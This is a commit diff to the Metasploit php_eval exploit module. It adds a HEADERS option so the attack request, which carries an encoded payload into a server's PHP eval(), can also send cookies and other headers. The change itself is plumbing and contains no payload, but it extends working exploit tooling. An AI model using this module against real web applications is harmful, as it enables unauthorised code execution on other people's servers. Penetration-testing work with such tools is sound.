Land rapid7#8698, Add HEADERS to php_eval module

Brent Cook · Brent Cook · commit b8f56d14e0d2 · 2017-08-14T09:54:22.000-04:00
diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb
@@ -45,6 +45,7 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
+        OptString.new('HEADERS',   [false,  "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])
       ])
 
   end
@@ -60,6 +61,18 @@ def check
     return Exploit::CheckCode::Safe
   end
 
+  def datastore_headers
+    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+    headers_hash = {}
+    if headers && !headers.empty?
+      headers.split(',').each do |header|
+        key, value = header.split(':')
+        headers_hash[key] = value.strip
+      end
+    end
+    headers_hash
+  end
+
   def exploit
     # very short timeout because the request may never return if we're
     # sending a socket payload
@@ -75,10 +88,9 @@ def exploit
     response = send_request_raw({
         'global' => true,
         'uri' => uri,
-        'headers' => {
+        'headers' => datastore_headers.merge(
             headername => payload.encoded,
-            'Connection' => 'close'
-          }
+            'Connection' => 'close')
       },timeout)
     if response and response.code != 200
       print_error("Server returned non-200 status code (#{response.code})")
